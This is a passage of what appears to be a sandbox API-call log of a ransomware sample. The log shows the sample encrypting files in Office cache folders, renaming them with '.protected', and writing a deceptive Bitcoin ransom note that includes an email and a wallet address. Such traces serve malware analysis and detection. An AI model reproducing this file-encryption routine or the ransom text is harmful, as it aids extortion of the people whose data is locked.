nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.665] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.665] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.671] WriteFile 
(in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.671] CloseHandle (hObject=0xb4) returned 1 [0056.798] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.protected") returned 89 [0056.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.protected")) returned 1 [0056.799] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0056.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0056.799] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0056.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.799] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0056.799] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x93a, lpOverlapped=0x0) returned 1 [0056.841] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x93a, lpOverlapped=0x0) returned 1 [0056.841] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.841] CloseHandle (hObject=0xb4) returned 1 [0056.842] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0056.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0056.842] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0056.842] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0056.842] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0056.842] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0056.843] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.843] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0056.843] lstrlenA (lpString="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") returned 684 [0056.843] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0056.844] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.844] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0056.844] CloseHandle (hObject=0xa4) returned 1 [0056.844] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0056.844] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 66 [0056.844] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0056.844] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0056.844] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned 68 [0056.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0056.853] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0056.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0056.853] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0056.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.853] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0056.853] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0056.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.854] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0056.854] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0056.854] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0056.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.854] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0056.854] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0056.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.854] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Windows") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Program Files") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Program Files (x86)") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="$Recycle.bin") returned 1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="System Volume Information") returned -1 [0056.854] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.854] StrStrIW (lpFirst="InfLR.cab", lpSrch=".protected") returned 0x0 [0056.854] lstrcmpW (lpString1="InfLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0056.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.855] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".txt") returned 0x0 
[0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".rar") returned 0x0 [0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".zip") returned 0x0 [0056.855] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.899] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.899] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.900] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.900] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.906] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.906] CloseHandle (hObject=0xb4) returned 1 [0056.957] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.protected") returned 86 [0056.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.protected")) returned 1 [0056.957] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Windows") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Program Files") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Program Files (x86)") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="$Recycle.bin") returned 1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="System Volume Information") returned -1 [0056.958] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".protected") returned 0x0 [0056.958] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.958] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xb4 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".txt") returned 0x0 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".rar") returned 0x0 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".zip") returned 0x0 [0056.958] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.972] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.972] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.159] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.159] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.165] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.165] CloseHandle (hObject=0xb4) returned 1 [0057.165] wnsprintfW (in: 
pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.protected") returned 92 [0057.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.protected")) returned 1 [0057.166] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Windows") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Program Files") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Program Files (x86)") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="$Recycle.bin") returned 1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="System Volume Information") returned -1 [0057.167] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".protected") returned 0x0 [0057.167] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0057.167] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.167] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.167] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".txt") returned 0x0 [0057.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".rar") returned 0x0 [0057.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".zip") returned 0x0 [0057.167] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x4cf, lpOverlapped=0x0) returned 1 [0057.295] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.303] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x4cf, lpOverlapped=0x0) returned 1 [0057.321] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.334] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.348] WriteFile (in: hFile=0xb4, 
